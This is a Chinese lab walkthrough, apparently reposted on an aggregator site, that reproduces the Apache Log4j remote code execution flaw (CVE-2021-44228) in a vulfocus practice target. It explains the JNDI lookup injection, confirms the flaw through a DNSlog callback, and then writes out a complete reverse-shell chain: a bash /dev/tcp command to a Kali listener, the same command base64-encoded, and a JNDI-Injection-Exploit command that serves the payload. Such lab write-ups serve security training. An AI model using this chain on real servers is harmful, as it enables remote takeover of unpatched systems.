CVE-2021-44228 Apache log4j 远程命令执行漏洞

这篇具有很好参考价值的文章主要介绍了CVE-2021-44228 Apache log4j 远程命令执行漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、漏洞原理

log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,从而达到我们应用的需求;这一切,都得益于一个灵活的配置文件,并不需要我们更改代码。

由于log4j提供了lookup机制,使日志中的${}也可进行执行,在其中输入JNDI的payload,即可进行执行。

CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全
使用lookup进行jndi注入,通过ldap、rmi等使其访问不安全的服务。
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全

二、验证漏洞

开启vulfocus的靶场
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全
进入指定url后点一下连接进行抓包,可以看到这次的输入是get型
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全
使用开源的dnslog:ceye.io
先url编码
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全
点击发送,DNSLOG收到了访问请求
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全

成功验证漏洞存在

三、反弹shell

反弹shell采取如图结构:
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全
监听机kali: 192.168.92.128
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全

反弹shell:

bash -i >& /dev/tcp/192.168.92.128/4444 0>&1

由于runtime不会执行管道,所以需要将反弹shell使用base64加密

bash -c "{echo,加密后文本}|{base64,-d}|{bash,-i}"

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDA+JjE=

bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar是jndi注入工具,起到了上述危险服务器的作用。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "10.88.84.219"

CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全

此处必须复制无版本号的rmi,否则不会成功,理由未知。
CVE-2021-44228 Apache log4j 远程命令执行漏洞,漏洞复现,apache,log4j,java,网络安全文章来源地址https://www.toymoban.com/news/detail-713585.html

到了这里,关于CVE-2021-44228 Apache log4j 远程命令执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Apache Log4j Server (CVE-2017-5645) 反序列化命令执行漏洞

    Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 说明 内容 漏洞编号 CVE-2017-5645 漏洞名称 Apache Log4j Server 反序列化命令执行漏洞 漏洞评级 高危 影响范围 Apache Log4j 2.8.2之前

    2024年02月07日
    浏览(43)
  • 【漏洞复现】Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-5645 漏洞名称 Log4j Server 反序列化命令执行漏洞 漏洞评级 高危 影响范围 Apache Log4j 2.8.2之前的2.x版本 漏洞描述 修复方案 1.1、漏洞描述 攻击者可以通过发送一个特别制作的2进

    2024年02月05日
    浏览(64)
  • Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理

    2.15.0之前版漏洞相关文章 Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(一)—开篇与基础知识 Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理 Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(三)—复现步骤(攻击方法) Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(四)—漏洞修复原理 2.15.

    2024年02月07日
    浏览(78)
  • [CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)

    刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。 影响版本:log4j 2.x = 2.14.1 漏洞简介 首先肯定得简单了解一下log4j2到底是什么东西,log4j2是Apache的

    2024年02月08日
    浏览(39)
  • Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)

    目录 一、漏洞介绍 二、漏洞环境搭建 三、漏洞利用 四、漏洞流量特征: CVE-2017-5645 是 Apache Log4j 服务器的一个反序列化命令执行漏洞,攻击者可以利用这个漏洞通过发送精心制作的请求,远程执行命令,从而危及服务器的安全。 进入漏洞目录文件,启动漏洞环境:docker-c

    2024年02月16日
    浏览(51)
  • log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)

    前言: Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。 2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ld

    2024年02月12日
    浏览(46)
  • log4j官方漏洞修复史(更新至2.17.1/CVE-2021-44832)

    自从log4j2.14.1版本爆出漏洞后,官方截止目前为止,共发布了3个稳定版本,分别是15.0、16.0、17.0。 本篇文章就分析一下每个版本都做了哪些事情,以此来评估每个版本升级的必要性。 分割线--------------------------------------------------------------------------------------- 在28号晚上,log4

    2024年02月07日
    浏览(61)
  • log4j复现之CVE-2017-5645

    一、靶机环境的安装 1.docker环境安装 2.下载vlnhub 由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。 二、编译启动靶机 三、漏洞利用 1.到官网下载 ysoserial-all.jar 文件 2.注意运行的Java环境是1.7

    2024年02月16日
    浏览(43)
  • Log4j远程代码执行漏洞

    简介 漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache log4j-2 是 Log4j 的升级,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据日志

    2024年02月11日
    浏览(67)
  • 完美解决:apache log4j cannot resolve问题

    引入下列pom文件

    2024年02月16日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包